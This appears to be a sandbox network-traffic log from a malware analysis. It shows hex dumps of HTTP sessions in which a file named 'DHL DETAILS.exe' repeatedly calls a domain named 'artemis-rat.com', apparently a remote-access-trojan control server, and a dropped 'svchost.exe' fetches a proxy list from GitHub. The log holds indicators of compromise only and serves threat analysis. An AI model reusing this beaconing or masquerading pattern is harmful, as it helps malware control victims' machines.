                                                                                    2024-03-09 12:14:10 UTC1370INData Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72
                                                                                    Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
                                                                                    2024-03-09 12:14:10 UTC1370INData Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f
                                                                                    Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
                                                                                    2024-03-09 12:14:10 UTC1370INData Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78
                                                                                    Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
                                                                                    2024-03-09 12:14:10 UTC1370INData Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f
                                                                                    Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.551523172.67.140.874436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:14 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:14 UTC161INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    2024-03-09 12:14:14 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.551524172.67.140.874436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:14 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:14 UTC161INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    2024-03-09 12:14:14 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.553536222.255.238.1594436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:18 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:18 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    2024-03-09 12:14:18 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.553639102.223.20.2174436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:18 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    2024-03-09 12:14:19 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    2024-03-09 12:14:19 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.555293140.82.114.344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:25 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                                    Host: github.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-03-09 12:14:26 UTC506INHTTP/1.1 200 OK
                                                                                    Server: GitHub.com
                                                                                    Date: Sat, 09 Mar 2024 12:14:10 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                    ETag: W/"8f9786a31fe2b7e37921fa8c44233cd3"
                                                                                    Cache-Control: max-age=0, private, must-revalidate
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                    X-Frame-Options: deny
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                    2024-03-09 12:14:26 UTC3590INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                    2024-03-09 12:14:26 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: connection: close
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                    Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                    Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                    Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69
                                                                                    Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72
                                                                                    Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 33 38 66 62 37 63 34 37 65 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f
                                                                                    Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-338fb7c47e7c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78
                                                                                    Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
                                                                                    2024-03-09 12:14:26 UTC1370INData Raw: 62 5f 62 65 68 61 76 69 6f 72 73 5f 69 6e 63 6c 75 64 65 2d 34 36 37 37 35 34 2d 66 39 62 64 34 33 33 65 39 35 39 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f
                                                                                    Data Ascii: b_behaviors_include-467754-f9bd433e9591.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.555292140.82.114.344343220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-09 12:14:25 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                                    Host: github.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-03-09 12:14:26 UTC506INHTTP/1.1 200 OK
                                                                                    Server: GitHub.com
                                                                                    Date: Sat, 09 Mar 2024 12:14:10 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                    ETag: W/"8f9786a31fe2b7e37921fa8c44233cd3"
                                                                                    Cache-Control: max-age=0, private, must-revalidate
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                    X-Frame-Options: deny
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    Referrer-Policy: no-referrer-when-downgrade
